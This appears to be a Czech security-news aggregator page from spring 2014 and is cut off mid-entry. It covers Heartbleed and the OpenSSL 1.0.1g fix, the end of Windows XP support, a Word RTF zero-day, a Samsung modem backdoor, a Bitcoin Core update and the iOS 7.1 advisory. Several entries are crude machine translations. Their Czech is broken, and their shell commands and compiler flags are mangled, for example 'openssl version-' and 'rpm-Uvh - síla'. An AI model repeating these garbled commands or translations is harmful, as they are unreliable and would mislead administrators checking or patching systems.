Pokud by ovšem došlo k napadení vlastních certifikačních/registračních agentur, tak budou mít odborníci ještě dlouho plné ruce práce.


Heartbleed: Se změnou hesel příliš nespěchejte

14.4.2014 Zranitelnosti
V souvislosti s chybou v knihovně OpenSSL s oficiálním názvem CVE-2014-0160, která je od úterý známá pod přezdívkou Heartbleed, mnozí doporučují změnit co nejdříve všechna hesla. To by však nemusel být tak dobrý nápad, jak se na první pohled zdá.

Někteří bezpečnostní výzkumníci si naopak myslí, že by lidé se změnou hesel příliš spěchat neměli. Chyba by totiž mohla odhalit veškeré údaje včetně hesel, uživatelských jmen a kryptografických klíčů, které se v současnosti zpracovávají na webových serverech.

Touto chybou jsou v současnosti mimo jiných ohrožení uživatelé banky Deutsche Bank a Yahoo (včetně jeho služeb, mezi které patří Flickr nebo Tumblr), nebo služby na sílení fotografií Imgur. Před kyberzločinci využívajícími této chyby nejsou v bezpečí ani zaměstnanci FBI.

Po celém světě je v ohrožení přibližně půl milionu webů. „Katastrofické je to správné slovo,“ okomentoval situaci nezávislý bezpečnostní expert Bruce Schneier. „Na stupnici od jedničky do desítky je tohle jedenáctka.“ Výzvy na změnu hesla, které se okamžitě po zjištění existence této chyby objevily, by však mohly nadělat více škody než užitku, protože pokud server zatím nebyl aktualizován a chybu neopravil, útočníci by mohli nové heslo okamžitě získat, myslí si Mark Schloesser, bezpečnostní výzkumník ze společnosti Rapid7.

Takto chyba v knihovně OpenSSL existuje již od roku 2012, to, zda už ho někdo zneužil, není jisté a ani neexistuje žádný způsob, jak to zjistit.

Uživatelé mohou zjistit, zda je konkrétní stránka stále ohrožená, pomocí nástroje, který dal dohromady vývojář Filippo Vaslorda. Některé servery už chybu opravily, ale to neznamená, že jsou proti ní plně zabezpečené. Chyba totiž odhodlaným útočníkům umožňuje ukrást soukromý klíč SSL certifikátu a tak weby, které jsou sice aktualizované, avšak stále používají stejné certifikáty jako předtím, zůstávají útočníkům otevřené.

„Riziko pro uživatele přetrvává, dokud organizace s aktualizovanou knihovnou OpenSSL neobdrží nové certifikáty a klíče SSL,“ říká Trey Ford z Rapid7. Útočníci do té doby mají ke všem údajům v podstatě volný přístup.


OpenSSL Opravy Serious TLS zabezpečení
8.4.2014 Zranitelnosti
Mezi správci knihovny OpenSSL, jeden z více široce rozmístěných kryptografických knihoven na webu, mají pevnou vážnou chybu zabezpečení, která by vyústila v odhalení 64 KB paměti na libovolného klienta nebo serveru, který byl připojen.

Podrobnosti o zranitelnosti, opraven ve verzi 1.0.1g z OpenSSL, jsou poněkud omezené.

Tato stránka OpenSSL Project říká, že chyba není před 1.0.1 ovlivnit verzí.
"A chybějící hranice kontrolu při manipulaci s příponou TLS srdeční lze odhalit až 64 kB paměti do připojeného klienta nebo serveru," uvolňovací OpenSSL poznámky pro 1.0.1g říci.

OpenSSL knihovny je nasazen ve velkém množství operačních systémů a aplikací, včetně široké škále Unix a Linux distribuce, stejně jako OS X. populárních webových serverů, jako je Nginx a Apache jsou také ovlivněny. Některé hlavní aplikace a platformy cloud-based, včetně CloudFlare. Inženýři této společnosti je prováděna oprava OpenSSL zranitelnosti minulý týden, předtím, než byly zveřejněny podrobnosti o chybě.

"OpenSSL je základní kryptografická knihovna CloudFlare používá pro SSL / TLS spojení. Pokud jsou vaše stránky na CloudFlare, každý navázáno spojení na HTTPS verzi vašeho webu prochází této knihovny. Jako jeden z největších implementací OpenSSL na internetu dnes, CloudFlare má povinnost být ostražití, kterým se tyto typy chyb před tím, než jít na veřejnost a útočníci začátek jejich využívání a dávat našim zákazníkům v ohrožení, "Nick Sullivan z CloudFlare napsal blog příspěvek .

"Vybízíme všechny ostatní běžící server, který používá OpenSSL upgradovat na verzi 1.0.1g které mají být chráněny před touto chybou zabezpečení. U předchozích verzí OpenSSL, re-kompilace s vlajkou OPENSSL_NO_HEARTBEATS povoleno bude chránit proti této chybě zabezpečení. OpenSSL 1.0.2 bude stanovena v 1.0.2-beta2. "

Lidé z Codenomicon dali dohromady dotazy na chyby, které jsem nazval Heartbleed zranitelnost. Jejich vysvětlení říká, že chyba by mohla umožnit komukoliv na internetu přečíst vzpomínku na stroj, který je chráněn zranitelnou verzí knihovny.

"Heartbleed chyba umožňuje komukoliv na internetu, číst paměť systémů chráněných zranitelných verzí softwaru OpenSSL. To ohrožuje tajné klíče sloužící k identifikaci poskytovatele služeb a šifrování provozu, jména a hesla uživatelů a skutečný obsah. To umožňuje útočníkům odposlouchávat komunikaci, krást data přímo ze služeb a uživatelů, a vydávat služeb a uživatelů, " popis říká.

"Ty budou pravděpodobně ovlivněny buď přímo, nebo nepřímo. OpenSSL je nejpopulárnější open source kryptografické knihovny a TLS (Transport Layer Security), implementace používá k zašifrování provoz na internetu. Vaše oblíbené sociální stránky, stránky vaší společnosti, commerce stránky, hobby stránky, stránka, kterou nainstalujete software z, nebo dokonce místa provozovány vaší vládou by mohly být pomocí zranitelný OpenSSL. Mnoho z on-line služeb pomocí protokolu TLS jak identifikovat se s tebou a chránit vaše soukromí a transakce. Ty by mohly mít síťové zařízení s přihlášení zajištěných tímto prováděním buggy na TLS. Dále můžete mít software na straně klienta v počítači, který by mohl odhalit data z počítače, pokud se připojíte k ohrožení služeb. "

OpenSSL 1.0.1g zahrnuje také opravu, která řeší určitou řadu útoků postranními kanály.

"Implementace Montgomery žebřík v OpenSSL přes 1.0.0l nezaručuje, že některé swapové operace mají konstantní časové chování, který usnadňuje pro místní uživatelé získat ECDSA nonces přes flush + reload vyrovnávací útoku side-channel", CVE vstup pro chybu říká.


OpenSSL CVE-2014-0160 fixní
8.4.2014 Zranitelnosti

OpenSSL 1.0.1g byl propuštěn opravit "A chybějící hranice kontrolu při manipulaci rozšíření TLS srdeční lze odhalit až 64 kB paměti do připojeného klienta nebo serveru. Tento problém však není dotčeno verze OpenSSL před 1,0 .1. "[ 1 ] známý jako Heartbleed chyby [ 3 ].

/ *** Aktualizace Johannes Ullrich ...: *** /

Ubuntu vydal patch pro postižené verze:

http://people.canonical.com/ ~ ubuntu-security/cve/2014/CVE-2014-0160.html

---

Nejrychlejší způsob, jak zjistit, jakou verzi OpenSSL, kterou používáte, je:

openssl version-

Ale ne, že některé programy mohou být sestaveny staticky s OpenSSL.

Pro zranitelný systém, bude to vrátí verze 1.0.1f (nebo tak něco, ale "g"). Také tam bude žádný kompilátor flag-DOPENSL_NO_HEARTBEATS.

Například na aktuální OS X Mavericks systému, dostanete:

$ Openssl version-
OpenSSL 1.0.1f 06.01.2014
postaven na: pon 6.ledna 23:30:17 PST 2014
platforma: darwin64-x86_64-cc
Možnosti: bn (64,64) rc4 (ptr, char) des (idx, CISC, 16, int) idea (int) blowfish (idx)
kompilátor: / usr / bin / řinčení-fpic-fno-common-DOPENSSL_PIC-DZLIB-DOPENSSL_THREADS-D_REENTRANT-DDSO_DLFCN-DHAVE_DLFCN_H-arch x86_64-O3-DL_ENDIAN-Wall-DOPENSSL_IA32_SSE2-DOPENSSL_BN_ASM_MONT-DOPENSSL_BN_ASM_MONT5-DOPENSSL_BN_ASM_GF2m-DSHA1_ASM-DSHA256_ASM-DSHA512_ASM - DMD5_ASM-DAES_ASM-DVPAES_ASM-DBSAES_ASM-DWHIRLPOOL_ASM-DGHASH_ASM
OPENSSLDIR: "/ opt / local / etc / openssl"

OS X není uveden v [3], jak zranitelné, ale předpokládá se, že seznam zveřejněný v [3] je neúplný. Následující výstup je ze systému CentOS, a jsem použil vlastní kompilované 1.0.1e RPM, že měl-DOPENSSL_NO_HEARTBEATS volba zapnuta.

# Openssl version-
OpenSSL 1.0.1e-FIPS 11.02.2013
postaven na: pon 7.dubna 21:56:27 EDT 2014
platforma: linux-x86_64
Možnosti: bn (64,64) md2 (int) rc4 (16x, int) des (idx, CISC, 16, int) idea (int) blowfish (idx)
kompilátor: gcc-fpic-DOPENSSL_PIC-DZLIB-DOPENSSL_THREADS-D_REENTRANT-DDSO_DLFCN-DHAVE_DLFCN_H-DKRB5_MIT -DOPENSSL_NO_HEARTBEATS -m64-DL_ENDIAN-DTERMIO-Wall-O2-g-Wa, - noexecstack-DPURIFY-DOPENSSL_IA32_SSE2-DOPENSSL_BN_ASM_MONT-DOPENSSL_BN_ASM_MONT5-DOPENSSL_BN_ASM_GF2m - DSHA1_ASM-DSHA256_ASM-DSHA512_ASM-DMD5_ASM-DAES_ASM-DVPAES_ASM-DBSAES_ASM-DWHIRLPOOL_ASM-DGHASH_ASM
OPENSSLDIR: "/ etc / PKI / TLS"
motory: dynamický

Můžete downlaod otáček na své vlastní riziko zde: https://isc.sans.edu/diaryimages/opensslrpms.zip (zahrnuje související RPM ze stejného zdrojového RPM). Vezměte prosím na vědomí, že jsem se aktualizovat verzi, takže je třeba ji nainstalovat pomocí:

rpm-Uvh - síla ./openssl-1.0.1e-16.el6.4.x86_64.rpm

INSTALACE NA VLASTNÍ NEBEZPEČÍ! LEHCE testován. ZIP soubor obsahuje zdrojový RPM stejně.

SHA512 Kontrolní součet:
a81e25067bf41038cbd73034dc31c05fa7a72d511686ef9d4ddb50913aa7
10776c3cad27d7ffe3e6dbcc4073e89714768327b6a2566bf2f4a5958791
ad7512d7 opensslrpms.zip

[1] http://www.openssl.org/news/secadv_20140407.txt
[2] http://www.openssl.org/news/vulnerabilities.html # 2014 do 0160
[3] http://heartbleed.com


Dnes končí podpora Windows XP

8.4.2014 Zranitelnosti
Poté, co Microsoft dnes ukončí podporu operačního systému Windows XP, budou miliony uživatelů po celém světě podle expertů již brzy čelit útokům kyberzločinců.

Ode dneška Microsoft nebude vydávat žádné bezpečnostní aktualizace, takže se dá očekávat, že útočníci rychle začnou objevovat ve Windows XP díry, na které již nikdy nebudou dostupné záplaty. „Někteří kyberzločinci mají již díry nachystané a čekali na tento den,“ říká bezpečnostní analytik Chris Sherman ze společnosti Forrester Research. „Pokud byste o nějaké díře věděli, proč byste nepočkali?“

Útočníci budou zkoumat budoucí bezpečnostní záplaty vydávané pro Windows Vista a Windows 7, díky nimž získají představu o tom, zda podobné díry neexistují i ve Windows XP. Ukončení podpory Windows XP je potenciální problém pro společnosti, které více než deset let starý operační systém od Microsoftu mají nainstalovaný na desítkách počítačů. Podle odhadů Forresteru využívá XP asi 20 % firem, přičemž ve veřejném sektoru je to ještě více. S podobným odhadem přišla také společnost Fiberlink.

Otázkou je, proč firmy nechtějí na novější verzi Windows migrovat. „Některé firmy to jednoduše podcenily a některá oddělení IT pak na migraci nedostala finance,“ říká Michael Silver z firmy Gartner s tím, že řada organizací nebrala ukončení podpory Windows XP vážně. Nespočet firem navíc používá aplikace, které mohou běžet pouze na XP, jelikož jsou s novějšími verzemi OS nekompatibilní. Jiné společnosti nechtějí upgradovat kvůli ovladačům, jež nejsou dostupné na drahý hardware (například ve zdravotnictví), který používají.

Migrace zabere spoustu času, záleží to však především na prostředcích, která mají firmy k dispozici. „Můžete upgradovat 20 000 zařízení přes víkend – pokud máte 20 000 techniků,“ dodává Silver. Takovou migraci má za sebou například francouzská instituce EHESP, která upgradovala 600 počítačů z Windows XP na Windows 7 v jednom měsíci s pouze třemi „ajťáky“ a jedním konzultantem. Povedlo se jí to díky částečné automatizaci celého procesu za použití služby od společnosti Dell s názvem Migration Fast Forward Service.

„Po otestování kompatibility našeho softwaru jsme přešli ze starých počítačů na nové a z Windows XP na Windows 7 rychlostí asi 30 počítačů denně,“ řekl Gwendal Rosiaux z EHESP. „Jsem si naprosto jistý, že to byla ta nejrychlejší a nejlevnější varianta. Bez automatizace by to nešlo.“ Microsoft bude dodávat bezpečnostní aktualizace i po osmém dubnu, avšak pouze pro společnosti, které si připlatí za nadstandardní podporu. Oficiální ceník této služby neexistuje, podle analytiků to však bude okolo dvou set dolarů ročně na počítač, přičemž tato částka se bude každý rok zdvojnásobovat.


Bitcoin aktualizace softwaru řeší transakce ID tvárnost chyby
6.4.2014 Zranitelnosti

Bitcoin jádra - stejně jako software Bitcoin infrastruktura byla přejmenována na, aby nedošlo k záměně s síti Bitcoin - byl aktualizován, aby se, mimo jiné, transakce ID tvárnost útoky mnohem obtížnější provádět. Pět chyb, které řeší tento konkrétní problém se byly provedeny v tomto novém (0.9.0) verzi softwaru, ale mnoho dalších byly začleněny do řešení otázek souvisejících s blokovat řetězec manipulace a skladování, hornictví, protokol a síť, hornictví, a tak dále. Instrukce jak nainstalovat Nejnovější verze nebo upgrade ze starší verze jsou také obsaženy v poznámkách k vydání . ID transakce tvárnost otázka byla nejpalčivější jeden, jak to vedlo k dočasné a / nebo trvalé uzavření některých populárních Bitcoin výměn, včetně toho z Mt. GOX, které údajně utrpěl velké ztráty při útocích, které se využívají slabosti. Společnost za výměnu podán návrh na konkurz ochranu v pozdním únoru, a uvedl, že 750.000 z bitcoins svých zákazníků a 100.000 z jeho vlastní bylo ztraceno. , ale ve čtvrtek přišli s nějakou dobrou zprávu, protože si zřejmě našel přibližně 200.000 bitcoins na "určité oldformat peněženky, které byly použity v minulosti a které, MtGox myslel, již držel nějaké bitcoins." Z bezpečnostních důvodů, které byly převedeny do režimu offline peněženky, a tyto pohyby byly hlášeny soudu dohlížet na konkurzní řízení. Vezmeme-li v úvahu existenci 200000 BTC, celkový počet bitcoins, které zmizely odhaduje se proto být přibližně 650,000 BTC, "poznamenal, že ve veřejném prohlášení , a dodal, že "důvody pro jejich zmizení a přesný počet bitcoins, který zmizel, je stále předmětem vyšetřování."


0-day Microsoft Word chyba využívány v cílených útoků
6.4.2014 Zranitelnosti
Microsoft vydal poradní upozornění zabezpečení vzdáleného spuštění kódu, který je využíván v "omezených cílených útoků zaměřených na aplikaci Microsoft Word 2010." Tato chyba ovlivňuje všechny podporované verze aplikace Word.

Počítače uživatelů mohou být ohroženy, pokud se otevře speciálně vytvořený soubor ve formátu RTF pomocí verze aplikace Microsoft Word, nebo se náhled nebo otevře speciálně vytvořenou ve formátu RTF e-mailové zprávy v aplikaci Microsoft Outlook při použití aplikace Microsoft Word jako e-mailový prohlížeč. Microsoft Word je výchozí e-mailový čtenář v aplikaci Microsoft Outlook 2007, Microsoft Outlook 2010 a Microsoft Outlook 2013. využívání této zranitelnosti může mít za následek útočník získává uživatelskými právy správce na stroji (tj. úplnou kontrolu systému) v případě, že uživatel používá admin účtu. "Ve webovém útoku, útočník mohl být hostitelem webu, který obsahuje webovou stránku, která obsahuje speciálně vytvořený soubor ve formátu RTF, který se používá, aby se pokusili tuto chybu zabezpečení zneužít. Navíc, dané weby a weby, které přijímají nebo hostit materiál poskytovaný uživateli a reklamu nebo by mohly obsahovat speciálně vytvořený obsah zneužívající tuto chybu zabezpečení, "vysvětlili. Uživatelé mohou zlákat k návštěvě těchto webových stránek prostřednictvím nevyžádaných e-mailů a IM. Naštěstí pro všechny, kteří se bojí o terčem, Microsoft má k dispozici Fix to nástroj, který zabraňuje chyba být využit, alespoň dokud je vydán trvalý fix. Pokud z jakéhokoli důvodu nechcete používat Fix It, existuje několik možných řešení pro dočasné řešení problému (viz pod "Doporučené postupy"). Žádné další podrobnosti o probíhajících útocích byly sdíleny. Je známo pouze to, že tři osoby z týmu Google Security Team ohlásil chybu.


Patch Tuesday pre-oznámení - XP oficiálně stává nepřítel příští týden
6.4.2014 Zranitelnosti

Microsoft zveřejnil svůj pravidelný pre-oznámení pro Patch Tuesday zde: http://technet.microsoft.com/en-us/security/bulletin/ms14-apr

Můžeme očekávat, že:

Konečné, ano konečné záplaty pro XP
Konečné záplaty pro Office 2003 i - to dostal mnohem méně než stiskněte XP, ale je stejně důležitá (http://office.microsoft.com/en-ca/help/support-is-ending-for-office-2003 -HA103306332.aspx)
Běžné opravy na ostatních verzích systému Windows a IE
Pár aktualizací WSUS a Windows Update. Změny systému Windows Update často za následek úterních aktualizacích příštích dvou částí - uvidíme v úterý Myslím, že
Takže po úterý XP a Office 2003 vstoupit do řad "internetu nepřátelských věcí" - platformy, které již nejsou záplaty dodavatelem jak vznikají nové problémy, takže se rychle stávají ohrožena. To zahrnuje věci jako na televizoru, DVR nebo domácí směrovač internetu, lednici, treadmill, IV čerpadla srdce Monitor nebo kardiostimulátoru - Oh, a pravděpodobností vaše i telefonicky - přečtěte si naše příběhy během posledních pár měsíců (nebo let opravdu ) pro více informací o nich. Bohužel, toto XP událost stane, vše naráz - miliony nepřátelských hostitelů jsou přidány do nepřátelské armády najednou.

Naštěstí, můžeme s tím něco udělat. Aktualizace pro systém Windows 7 a 8 je levné, je-li váš hardware je na tento úkol. Pokud máte starší hardware, vidím používá Windows 7/8, který je schopen desktop hardware za $ 100 - 200 dolarů v těchto dnech, a notebooky se zdají být ve stejném rozsahu. Pokud se chystáte na novou platformu Windows není ve vaší budoucnosti, jste pravděpodobně již při pohledu na jednoho z nejpopulárnějších distribucí Linuxu - distribucí like Unbuntu, nebo Xubunto nebo mincovna, které se snaží napodobit uživatelské rozhraní, které mnozí domácí uživatelé jsou obeznámeni s . Tam je podobný řada možností pro Office (upgrady a alternativ).

Použijte náš komentář formulář a dejte nám vědět, co děláte, nebo jste udělal pro uživatelskou komunitu (nebo rodinných příslušníků), které by mohly být stále na XP nebo Office 2003 po úterý.


Backdoor v Samsung Galaxy objevené zařízení
1.4.2014 Zranitelnosti

Vývojáři Replicant, je "zcela zdarma / libre verzi Android", objevili backdoor v řadě Samsung Galaxy zařízení, které by mohlo umožnit útočníkovi získat vzdálený přístup k nim a jejich obsahu "Dnešní telefony jsou vybaveny dvěma samostatnými procesory: jeden je univerzální aplikace, procesor, který běží hlavní operační systém, např. Android,. druhý, známý jako modem, pásma, nebo rádio, má na starosti komunikaci s mobilní telefonní sítě Tento procesor běží vždy proprietární operační systém , a tyto systémy je známo, že mají zadní vrátka, díky nimž je možné vzdáleně převést modem do vzdálené špionážní zařízení, "řekl jeden z vývojářů vysvětlil v příspěvku na Free Software Foundation blogu. "špionáž může zahrnovat aktivaci mikrofon zařízení, ale to mohlo také použít přesné GPS polohy zařízení a přístup ke kameře, stejně jako uživatelská data uložená v telefonu. Kromě toho, modemy jsou spojeny po většinu času do sítě operátora, takže na zadní vrátka téměř vždy k dispozici. " Ve své práci se analyzovat tento proprietární program, dodáno a běží na zařízeních Samsung, a zjistili, že to umožňuje modem číst, zapisovat a mazat soubory na úložiště telefonu, a také k přístupu a upravovat osobní údaje uživatele o několik zařízení. "za předpokladu, že modem běží proprietární software a lze dálkově ovládat, že backdoor poskytuje vzdálený přístup k datům v telefonu, a to i v případě, kdy je modem izolované a nemůže získat přístup k ukládání přímo," upozornil Pavel Kocialkowski ven. ale tam je řešení tohoto problému:. vyměnit tento OS pro volný jeden - Replicant, například "Pokud modem žádá číst nebo zapisovat soubory, Replicant nespolupracuje s ním," říká Kocialkowski, ale přidává varování: "Replicant nespolupracuje s zadní vrátka, ale v případě, že modem může převzít kontrolu hlavního procesoru a přepsat software v latter, není tam žádný způsob, jak pro hlavní procesor systém, jako Replicant to zastavit. Ale aspoň víme, že jsme uzavřeli jednu konkrétní backdoor. " Další technické podrobnosti o backdoor a seznam dotčených zařízení lze vyzvednout zde .


Chyba v IE odhalila mezery v aktualizačním systému Microsoftu
31.3.2014 Zranitelnosti
Rychlost, jakou kyberzločinci zneužili zranitelnosti objevené v IE v polovině února, ukazuje na nedostatky v aktualizačním mechanismu Microsoftu.

Na závažnou zranitelnost v prohlížeči Internet Explorer 10, která by případným útočníkům umožnila vzdálené spuštění škodlivého kódu na uživatelském zařízení, bezpečnostní výzkumníci poprvé upozornili 13. března poté, co si všimli napadení webu francouzské Asociace leteckých výrobců. Toto sdružení má přes 300 členů.

Asi týden po objevení chyby Microsoft uvolnil modul Fix It, který uživatelům poskytoval dočasnou ochranu před vydáním opravné aktualizace. Problém je podle analytiků v tom, že o těchto modulech ví jen málo uživatelů. Firmy samozřejmě mohly ještě provést přechod na novější IE 11, který danou zranitelnost neobsahuje, ovšem takové změny rozhodně nejsou pro firemní uživatele snadnou záležitostí.

Po svém zveřejnění se zranitelnost přirozeně dostala také do pozornosti internetových útočníků. Ti ji okamžitě začali využívat ke svým operacím. Podle bezpečnostní společnosti Websense se obětmi útoků stalo hned několik webových stránek. Mělo prý dojít k napadení stránek jisté japonské cestovní kanceláře, taiwanské školy či hongkongské univerzity. Rychlá reakce útočníků podle Websense ukazuje na jejich snahu bezpečnostní díru maximálně využít k rychlému obohacení.

Microsoft za svůj systém oprav obvykle ze strany bezpečnostních expertů sklízí pochvalu. Opravné aktualizace přináší pravidelně každý měsíc a v případě nouze i častěji. Například Oracle tak činí čtvrtletně a Cisco dokonce jen dvakrát do roka.

Podle některých expertů by se přesto v tomto směru dalo udělat více. Shodují se například v potřebě rychlejších aktualizačních cyklů. Zejména v případě IE by se prý mělo upustit od měsíčního cyklu a uvolňovat aktualizace co nejdříve po odhalení zranitelnosti.

S takovým řešením by však zase mohly mít některé společnosti problém. Pro ty by proto bylo vhodnější, aby vhodně zvolenými opatřeními zamezily v přístupu k citlivým datům prostřednictvím potenciálně zranitelného prohlížeče. Navíc ne každá zranitelnost je rizikem pro všechny – firmy se mohou po vyhodnocení zranitelnosti samy rozhodnout, jestli opravnou aktualizaci potřebují či nikoliv.


Apple iOS 7.1
10.3.2014 Mobil | Zranitelnosti

Zde je detailní informace o dnešní Apple verzí - jak iOS a Apple TV byla aktualizována

APPLE-SA-2014-03-10-1 iOS 7.1

iOS 7.1 je nyní k dispozici a řeší následující:

Zálohování
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: upraveného zálohování můžete změnit souborový systém
Popis: symbolický odkaz v záloze by být obnovena, což umožňuje
následné operace při obnovení zapisovat do zbytku
souborového systému. Tento problém byl vyřešen kontrolou pro symbolické odkazy
během procesu obnovení.
CVE-ID
CVE-2013-5133: evad3rs

Certifikát Důvěra politika
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: kořenové certifikáty byly aktualizované
Popis: Několik certifikáty byly přidány nebo odstraněny ze
seznamu systémových kořenů.

Profily konfigurace
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Profil vypršení termíny nebyly dodrženy
Popis: vypršení platnosti dat mobilních konfiguračních profilů byly
správně vyhodnoceny. Tento problém byl vyřešen díky lepší
manipulaci konfiguračních profilů.
CVE-ID
CVE-2014-1267

CoreCapture
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace může způsobit neočekávané systém
ukončení
Popis: dostupné problém tvrzení existoval v CoreCapture v
manipulaci s IOKit volání API. Tato otázka byla řešena prostřednictvím
dodatečného ověření vstupu z IOKit.
CVE-ID
CVE-2014-1271: Filippo Bigarella

Crash Reporting
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen změnit oprávnění na libovolné
soubory
Popis: CrashHouseKeeping následuje symbolické odkazy při
změně oprávnění k souborům. Tento problém byl vyřešen tím, že
následující symbolické odkazy při změně oprávnění k souborům.
CVE-ID
CVE-2014-1272: evad3rs

dyld
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Požadavky podepisování kódu lze obejít
Popis: Text stěhování pokyny v dynamických knihovnách může
být načten dyld bez záruky kód podpisu. Tato záležitost byla
řešena tím, že ignoruje pokyny textu přesídlení.
CVE-ID
CVE-2014-1273: evad3rs

FaceTime
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
přistupovat FaceTime kontakty ze zámku obrazovky
Popis: FaceTime kontakty na zamčené Přístroj může být vystaven působení
tím, že se nepodařilo FaceTime hovor z obrazovky uzamčení. Tento problém byl
vyřešen lepší manipulaci s FaceTime hovory.
CVE-ID
CVE-2014-1274

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného PDF souboru může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení z JPEG2000
obrázků v PDF souborech. Tento problém byl vyřešen lepší hranic
kontroly.
CVE-ID
CVE-2014-1275: Felix Groebert týmu Google Security

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru TIFF může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení Libtiff v z TIFF
obrázků. Tento problém byl vyřešen prostřednictvím dodatečného ověření
TIFF.
CVE-ID
CVE-2012-2088

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru JPEG, může vést k
prozrazení obsahu paměťové
Popis: Neinicializovaný vydání access memory existoval v
zacházení Libjpeg ze markery JPEG, což vede k prozrazení
obsahu paměti. Tento problém byl vyřešen prostřednictvím dodatečného
ověření souborů JPEG.
CVE-ID
CVE-2013-6629: Michal Zalewski

IOKit HID akce
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace mohou sledovat na akce uživatele v jiných
apps
Popis: Rozhraní v rámcových IOKit povolených škodlivých aplikací
pro sledování na uživatelské akce v jiných aplikacích. Tento problém byl vyřešen
díky zlepšené politiky řízení přístupu v rámci.
CVE-ID
CVE-2014-1276: Min Zheng Hui Xue, a Dr. Tao (Lenx) Wei z FireEye

iTunes Store
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Útočník man-in-the-middle může lákat uživatele na
stahování škodlivého aplikace pomocí Enterprise App ke stažení
Popis: Útočník s výsadní postavení sítě by
spoof síťové komunikace lákat uživatele na stahování
škodlivého aplikace. Tento problém byl zmírněn pomocí SSL a pobízet
uživatele během URL přesměrování.
CVE-ID
CVE-2014-1277: Stefan Esser

Jádro
K dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen způsobit neočekávané systémové
ukončení nebo spuštění libovolného kódu v jádře
Description: out of bounds paměti Přístup problém existoval v ARM
funkce ptmx_get_ioctl. Tento problém byl vyřešen lepší
kontrolou hranic.
CVE-ID
CVE-2014-1278: evad3rs

Prohlížeč
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Otevření upraveného dokumentu aplikace Microsoft Word může
vést k neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
spuštění
Popis: dvojitý bez vydání existoval v manipulaci s
dokumenty Microsoft Word. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1252: Felix Groebert z týmu Google Security

Fotografie backend
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Jakmile snímky vymažete, může stále vypadat na fotkách aplikaci pod
průhledné obrázky
Popis: Odstranění obrázku z knihovny aktiv ani odstranit
mezipaměti verze obrazu. Tento problém byl vyřešen díky
lepší správě paměti cache.
CVE-ID
CVE-2014-1281: Walter Hoelblinger z Hoelblinger.com, Morgan Adams,
Tom Pennington

Profily
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Konfigurační profil může být skryté od uživatele
Popis: konfiguračního profilu s dlouhým názvem by mohl být
zaveden do zařízení, ale byl nezobrazuje se v uživatelském rozhraní profilu.
Problém byl vyřešen lepší prací s názvy profilu.
CVE-ID
CVE-2014-1282: Assaf Hefetz, Yair Amit a Adi Sharabani z Skycure

Safari
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Pověření uživatele mohou být zveřejněny na nečekané stránky pomocí
funkce Automatické vyplňování
Popis: Safari může autofilled uživatelská jména a hesla
do pomocného rámu od jiné doméně, než na hlavním rámu. Tento
problém byl vyřešen lepší sledování původu.
CVE-ID
CVE-2013-5227: Niklas Malmgren z Klarna AB

Nastavení - Účty
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
zakázat Find My iPhone, aniž byste zadali iCloud hesla
Popis: Problém státní správy existoval v zacházení s
Find My iPhone stavu. Tento problém byl vyřešen lepší
manipulaci Find My iPhone stavu.
CVE-ID
CVE-2014-1284

Springboard
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
vidět na domovskou obrazovku zařízení, i když je přístroj nebyl
aktivován
Popis: neočekávané ukončení aplikace při aktivaci
může způsobit, že telefon bude ukázat na domovskou obrazovku. Tento problém byl
vyřešen lepší zpracování chyb při aktivaci.
CVE-ID
CVE-2014-1285: Roboboi99

Springboard Screen Lock
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Vzdálený útočník může způsobit zámek displeje, aby
se stal odpovídat
Popis: otázka státní správa existoval v zámku obrazovce.
Tento problém byl vyřešen lepší správou státu.
CVE-ID
CVE-2014-1286: Bogdan Alecu M-sec.net

TelephonyUI Framework
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: webová stránka by mohla vyvolat zvukový volání FaceTime bez uživatelské
interakce
Popis: Safari nekonzultoval uživatele před zahájením
FaceTime-audio: / / URL. Tento problém byl vyřešen přidáním
řádku s potvrzením.
CVE-ID
CVE-2013-6835: Guillaume Rosse

USB Host
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
způsobit spuštění libovolného kódu v režimu jádra
Popis: problém poškození paměti existoval v zacházení
